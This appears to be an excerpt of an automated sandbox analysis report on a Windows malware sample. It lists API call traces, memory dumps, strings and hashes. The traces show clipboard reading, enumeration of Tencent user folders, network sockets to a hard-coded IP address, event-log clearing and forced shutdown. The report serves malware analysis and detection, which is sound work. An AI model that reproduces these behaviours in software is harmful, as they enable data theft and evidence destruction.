                                  • Part of subcall function 10001430: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 100014A3
                                  • Part of subcall function 10001C40: setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 10001C6C
                                  • Part of subcall function 10001C40: CancelIo.KERNEL32(?), ref: 10001C72
                                  • Part of subcall function 10001C40: InterlockedExchange.KERNEL32(?,00000000), ref: 10001C7E
                                  • Part of subcall function 10001C40: closesocket.WS2_32(?), ref: 10001C88
                                  • Part of subcall function 10001C40: SetEvent.KERNEL32(?), ref: 10001C92
                                  • Part of subcall function 10001C40: ResetEvent.KERNEL32(?), ref: 10001CA3
                                  • Part of subcall function 10001C40: socket.WS2_32(00000002,00000001,00000006), ref: 10001CB2
                                  • Part of subcall function 10001630: WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 1000166B
                                  • Part of subcall function 10001630: setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 10001691
                                  • Part of subcall function 10001630: CancelIo.KERNEL32(?), ref: 1000169B
                                  • Part of subcall function 10001630: InterlockedExchange.KERNEL32(?,00000000), ref: 100016A4
                                  • Part of subcall function 10001630: closesocket.WS2_32(?), ref: 100016AE
                                  • Part of subcall function 10001630: SetEvent.KERNEL32(?), ref: 100016B8
                                  • Part of subcall function 10001630: CloseHandle.KERNEL32(?,?,00000000), ref: 100016CF
                                  • Part of subcall function 10001630: CloseHandle.KERNEL32(?,?,00000000), ref: 100016D5
                                  • Part of subcall function 10001630: WSACleanup.WS2_32 ref: 100016D7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: EventPriorityThreadlstrcat$CancelClassCloseCreateCurrentDeleteExchangeFileHandleInterlockedNameOpenProcessServiceclosesocketsetsockopt$CleanupDirectoryEnvironmentManagerModuleObjectPathResetResumeShortSingleStartupSystemVariableWait_doexit_memsetlstrcpysocket
                                • String ID: .key$119.91.152.151$Rsymwe miusskwq$\Def$ault
                                • API String ID: 4114308358-161439249
                                • Opcode ID: b58704b316d4997d06dbbbef33f2cbbd498d705c473001a9a43cc9000a7a3a53
                                • Instruction ID: 7f913a008ee531be3ddb39d32d39da8f410e53daeb270ce78aedb1d969ac0540
                                • Opcode Fuzzy Hash: b58704b316d4997d06dbbbef33f2cbbd498d705c473001a9a43cc9000a7a3a53
                                • Instruction Fuzzy Hash: 21318B75800648EBEB14DFE0CD46BDDB778EB04751F608258F625672C1DB746A04CB61
                                APIs
                                • _memset.LIBCMT ref: 10001EEE
                                • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 10001F03
                                • _memset.LIBCMT ref: 10001F1E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 10001FA0
                                • FindNextFileA.KERNEL32(00000000,?), ref: 10001FB6
                                • FindNextFileA.KERNEL32(00000000,?), ref: 10001FC2
                                • _memmove.LIBCMT ref: 1000201E
                                • FindNextFileA.KERNEL32(00000000,00000010), ref: 10002036
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileFind$Next$_memset$FirstFolderPathSpecial_memmove
                                • String ID: \Tencent\Users\*.*
                                • API String ID: 3793188505-2867266411
                                • Opcode ID: 0c5bfbd64201977f5e4781be07d703c36560093189d88490e710100f324425d6
                                • Instruction ID: c6894fb4709516a48a83cd4c7d6c7a0d2b5f239eda33b553aed4097212bf847e
                                • Opcode Fuzzy Hash: 0c5bfbd64201977f5e4781be07d703c36560093189d88490e710100f324425d6
                                • Instruction Fuzzy Hash: F641D731504359DBE715CB64CC94BEAB7F8EB48780F1880D5E94C9B255EAB1EB44CB90
                                APIs
                                • CoCreateInstance.OLE32(0092B14C,00000000,00000017,00962C18,?,ED5B0DC1), ref: 006D250F
                                • OleRun.OLE32(?), ref: 006D251D
                                • _com_issue_error.COMSUPPD ref: 006D2599
                                • SysStringByteLen.OLEAUT32 ref: 006D259F
                                • SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 006D25A7
                                • _com_issue_error.COMSUPPD ref: 006D25B9
                                  • Part of subcall function 006D22B0: CoInitialize.OLE32(00000000), ref: 006D22E0
                                  • Part of subcall function 006D22B0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2322
                                  • Part of subcall function 006D22B0: _com_issue_error.COMSUPPD ref: 006D233E
                                  • Part of subcall function 006D22B0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2375
                                  • Part of subcall function 006D22B0: _com_issue_error.COMSUPPD ref: 006D2392
                                  • Part of subcall function 006D22B0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D23C8
                                  • Part of subcall function 006D22B0: _com_issue_error.COMSUPPD ref: 006D23E5
                                • VariantClear.OLEAUT32(?), ref: 006D261E
                                • VariantClear.OLEAUT32(?), ref: 006D2624
                                • InterlockedDecrement.KERNEL32(?), ref: 006D2678
                                • SysFreeString.OLEAUT32(00000000), ref: 006D268D
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: String$_com_issue_error$Convert_com_util::$ByteClearVariant$AllocCreateDecrementFreeInitializeInstanceInterlocked
                                • String ID:
                                • API String ID: 1282423391-0
                                • Opcode ID: 76f78d69f889a462ee702dbcc6132691f75b6ea023afbf61f087e9bc631aed90
                                • Instruction ID: 41fb60eb3539c2c63f305a66cc8e5ed49aa8b63bc0edc99bcb8a86532fa80452
                                • Opcode Fuzzy Hash: 76f78d69f889a462ee702dbcc6132691f75b6ea023afbf61f087e9bc631aed90
                                • Instruction Fuzzy Hash: 29519D72E012169FDB10DFA8D850B9EBBB9EF58714F14815AE804EB351D771EA02CBA1
                                APIs
                                  • Part of subcall function 007184A0: CreateCompatibleDC.GDI32(00000000), ref: 007184B2
                                • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 007F0363
                                • std::_Fac_node::_Fac_node.LIBCPMTD ref: 007F041C
                                • std::bad_exception::~bad_exception.LIBCMTD ref: 007F03AD
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                • std::bad_exception::~bad_exception.LIBCMTD ref: 007F045C
                                  • Part of subcall function 00718560: SelectObject.GDI32(?,00000000), ref: 0071859E
                                  • Part of subcall function 00719100: BitBlt.GDI32(?,00CC0020,00000000,00000000,?,00000000,?,00000000,00000000), ref: 00719152
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessageProcessorVirtualstd::bad_exception::~bad_exception$CompatibleConcurrency::CreateFac_nodeFac_node::_ObjectPeekPostQuitRootRoot::Selectstd::_
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdrawmanager.cpp
                                • API String ID: 1066838796-1960309177
                                • Opcode ID: 02d1baa22186e6f3f13a3dc330dfe7d970abb9a444be320abef62fba867c17c1
                                • Instruction ID: c3da829c84f1284dd842239441eff5bbbaca83af071e16e2e9fe477a3de86c38
                                • Opcode Fuzzy Hash: 02d1baa22186e6f3f13a3dc330dfe7d970abb9a444be320abef62fba867c17c1
                                • Instruction Fuzzy Hash: CFF1A17190411DCBDB14DFA8CC95BFEBBB2EF84301F148228E551A76C6DB389985DBA0
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Event
                                • String ID:
                                • API String ID: 4201588131-0
                                • Opcode ID: 3690c088420023298787f23dc437296495fc4d7f6d2e6d772ec4c92e1a76dc5b
                                • Instruction ID: 5fd4ca29f6b29bff62127f52484fe0a15330a613d1b1269f5da8e441b77e0284
                                • Opcode Fuzzy Hash: 3690c088420023298787f23dc437296495fc4d7f6d2e6d772ec4c92e1a76dc5b
                                • Instruction Fuzzy Hash: 47216D36600295ABF30197F49C09BAE3BA9DF467E2F148025F9C58E116CA75D98583A2
                                APIs
                                • OpenClipboard.USER32(00000000), ref: 10001E1B
                                • GetClipboardData.USER32(00000001), ref: 10001E2C
                                • GlobalLock.KERNEL32(00000000), ref: 10001E35
                                • GlobalUnlock.KERNEL32(00000000), ref: 10001E88
                                • CloseClipboard.USER32 ref: 10001E8E
                                • GlobalUnlock.KERNEL32(00000000), ref: 10001EB4
                                • CloseClipboard.USER32 ref: 10001EBA
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$Global$CloseUnlock$DataLockOpen
                                • String ID:
                                • API String ID: 2537359085-0
                                • Opcode ID: a271f82b4e8489506fb2fdd0d76e1bd64d0577c72b2d9ef023c0b0bb292203ef
                                • Instruction ID: 4916ea4a5f195c122f045e85196f9b359c3514cf79ea62e1c08841ecf2975a15
                                • Opcode Fuzzy Hash: a271f82b4e8489506fb2fdd0d76e1bd64d0577c72b2d9ef023c0b0bb292203ef
                                • Instruction Fuzzy Hash: 96110635600255DFF700DFA4CCD89FEBBB9EF49382B18C259EC058B261DAB2D9048790
                                APIs
                                • IsDebuggerPresent.KERNEL32 ref: 008F100D
                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 008F1024
                                • UnhandledExceptionFilter.KERNEL32(00968180), ref: 008F102F
                                • GetCurrentProcess.KERNEL32(C0000409), ref: 008F104D
                                • TerminateProcess.KERNEL32(00000000), ref: 008F1054
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                • String ID:
                                • API String ID: 2579439406-0
                                • Opcode ID: 4f46077db7d8349e1a14be02f4f06048f1ba292af34e562336bb8243217e4e5c
                                • Instruction ID: b6d8ee08250e4096f3acc53338d7934c69ffa2b1335c78f188a6d991215e5a55
                                • Opcode Fuzzy Hash: 4f46077db7d8349e1a14be02f4f06048f1ba292af34e562336bb8243217e4e5c
                                • Instruction Fuzzy Hash: D3210FB886A384CBC714EFA5FEC46143BB0FB58704F01611AF9088B360E7B15D85AF46
                                APIs
                                • IsDebuggerPresent.KERNEL32 ref: 1001016A
                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001017F
                                • UnhandledExceptionFilter.KERNEL32(10017C64), ref: 1001018A
                                • GetCurrentProcess.KERNEL32(C0000409), ref: 100101A6
                                • TerminateProcess.KERNEL32(00000000), ref: 100101AD
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                • String ID:
                                • API String ID: 2579439406-0
                                • Opcode ID: 79d30ac52e5b0b10dc8a904ef4b6925469f4872fc2a0d060e40767cf00f4625f
                                • Instruction ID: cb44e0a83b0eb82df8580bdab058a9cbe1c520359eeb9978929d51e25e3fd79d
                                • Opcode Fuzzy Hash: 79d30ac52e5b0b10dc8a904ef4b6925469f4872fc2a0d060e40767cf00f4625f
                                • Instruction Fuzzy Hash: 5321ADB49013A4EFF705DF64C9C96487BB4FB08705F54851AE9288B360E7B5DA85CF41
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ;$;$__atl_condVal$f:\dd\vctools\vc7libs\ship\atlmfc\include\atltime.inl$m_time != -1
                                • API String ID: 0-555451278
                                • Opcode ID: 43d8507b2f064333b4f445c47859139dea6bf518257f160fd9642e1df6b6f298
                                • Instruction ID: d0e358ea3828e00dfa35bcffdd9e11b3cc0f5937a3261201e3a66c905d1aed0d
                                • Opcode Fuzzy Hash: 43d8507b2f064333b4f445c47859139dea6bf518257f160fd9642e1df6b6f298
                                • Instruction Fuzzy Hash: F391B170E4021CAFEF24DFA8C946BAEB7B5EF50718F10841AE915BA2C5E7749881CF45
                                APIs
                                • IsWindow.USER32(?), ref: 00705B90
                                • IsIconic.USER32(?), ref: 00705BB2
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl, xrefs: 00705B9C
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$IconicPeekPostQuitWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
                                • API String ID: 3421966480-1404496517
                                • Opcode ID: 877a581298a550c9e9efd2a645db3dd0d772b935c5c16d61347b28db08c8b80e
                                • Instruction ID: 742ef9219f9a3f46b3819f3e9336f0f8dd7a864acaa0d9b710896a9fa9b63acc
                                • Opcode Fuzzy Hash: 877a581298a550c9e9efd2a645db3dd0d772b935c5c16d61347b28db08c8b80e
                                • Instruction Fuzzy Hash: B5E04FB5614208EFC728DB95DE55D2B7BE8FF48340B240298F908A7282DA39ED019E55
                                APIs
                                • OpenEventLogA.ADVAPI32(00000000,10016318), ref: 100055D7
                                • ClearEventLogA.ADVAPI32(00000000,00000000), ref: 100055E2
                                • CloseEventLog.ADVAPI32(00000000), ref: 100055E9
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Event$ClearCloseOpen
                                • String ID:
                                • API String ID: 1391105993-0
                                • Opcode ID: fa2f73f25ee44bbd8f0909292a758df83592592e11bd994421d3641351c0d5bf
                                • Instruction ID: 3baa875ff99ff439213d0f5687e34629966e2455e434f6cc3ec46a22bdbbfe36
                                • Opcode Fuzzy Hash: fa2f73f25ee44bbd8f0909292a758df83592592e11bd994421d3641351c0d5bf
                                • Instruction Fuzzy Hash: 8B01D271D01A58EBEB20CF99CC8078EBBB4EB08383F448065E919DF200D636CB508B95
                                APIs
                                  • Part of subcall function 00708940: IsWindow.USER32(?), ref: 00708950
                                  • Part of subcall function 00708940: GetWindowLongA.USER32(?,000000F0), ref: 00708989
                                • GetKeyState.USER32(00000010), ref: 006FC62A
                                • GetKeyState.USER32(00000011), ref: 006FC637
                                • GetKeyState.USER32(00000012), ref: 006FC646
                                  • Part of subcall function 00705930: IsWindow.USER32(?), ref: 00705940
                                  • Part of subcall function 00705930: SendMessageA.USER32(?,?,?,00000000), ref: 0070596E
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: StateWindow$LongMessageSend
                                • String ID:
                                • API String ID: 3966134725-0
                                • Opcode ID: 2b9a30a528d447e017865d239f0ac2701e2b688214a238b2fe55d4a07b5ae029
                                • Instruction ID: 61e2115ee2ec4d625d5c667f98c7fb49ac51bd818643835de3ad41919c51e1bc
                                • Opcode Fuzzy Hash: 2b9a30a528d447e017865d239f0ac2701e2b688214a238b2fe55d4a07b5ae029
                                • Instruction Fuzzy Hash: 5601F470A58A0CEBD758AB68CE4ABBD76B29B51B11F001038B602EA1C0DE744841F61A
                                APIs
                                  • Part of subcall function 100071A0: LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 100071B8
                                  • Part of subcall function 100071A0: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 100071C8
                                  • Part of subcall function 100071A0: GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 100071D3
                                  • Part of subcall function 100071A0: GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 100071DE
                                  • Part of subcall function 100071A0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 100071E8
                                  • Part of subcall function 100071A0: GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 100071F3
                                • ExitWindowsEx.USER32(?,00000000), ref: 10005508
                                  • Part of subcall function 100071A0: LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 10007245
                                  • Part of subcall function 100071A0: GetProcAddress.KERNEL32(00000000,GetLastError), ref: 1000724D
                                  • Part of subcall function 100071A0: CloseHandle.KERNEL32(?), ref: 10007260
                                  • Part of subcall function 100071A0: FreeLibrary.KERNEL32(00000000), ref: 10007271
                                  • Part of subcall function 100071A0: FreeLibrary.KERNEL32(?), ref: 1000727B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryProc$Load$Free$CloseExitHandleWindows
                                • String ID: SeShutdownPrivilege
                                • API String ID: 3789203340-3733053543
                                • Opcode ID: fb99181493b8cc15a0599176facf8f9fe5c9c83052d2d886f4aea09e722ab0a5
                                • Instruction ID: 0cd0119c492fd1f55435c6b341ea754c1995436913f455747963e9a6e6df0698
                                • Opcode Fuzzy Hash: fb99181493b8cc15a0599176facf8f9fe5c9c83052d2d886f4aea09e722ab0a5
                                • Instruction Fuzzy Hash: 4FD0C935991208B3F5109699AC87F897648DB046D6F884010FB1C6E1C2E5B7B29001A6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throw
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\cmdtarg.cpp
                                • API String ID: 2005118841-720059512
                                • Opcode ID: 5cd0c5873fcf546c9f0730fb9a759f7f5a2dcef50817d4188637e1981615c33e
                                • Instruction ID: a161402ecf1bba5fc05f7f6549f6c70acd4fbea4504de584232de057f0e3eadd
                                • Opcode Fuzzy Hash: 5cd0c5873fcf546c9f0730fb9a759f7f5a2dcef50817d4188637e1981615c33e
                                • Instruction Fuzzy Hash: BFE160B4A00209EFDF14DFA5C949BAE77F5BF44744F218228EA14A62C1D7B8AD81CF54
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 89bb0468086c3ea8bfb8e79e4e49a20ddb17fdb9226143a7520eb56878c2f198
                                • Instruction ID: f8ee47623e48677ee6e2624788f2965effe8fed9e173fe81514a48dcd5e91841
                                • Opcode Fuzzy Hash: 89bb0468086c3ea8bfb8e79e4e49a20ddb17fdb9226143a7520eb56878c2f198
                                • Instruction Fuzzy Hash: 7F51EA32E042698FCB14CF69C8A42FEBBB1EF49210F49419EDD959B341C635AA15DB90
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 006EA80A
                                • VariantInit.OLEAUT32(?), ref: 006EA810
                                • InterlockedIncrement.KERNEL32(?), ref: 006EA8A6
                                • _com_util::ConvertStringToBSTR.COMSUPPD ref: 006EA8D6
                                • _com_issue_error.COMSUPPD ref: 006EA8EB
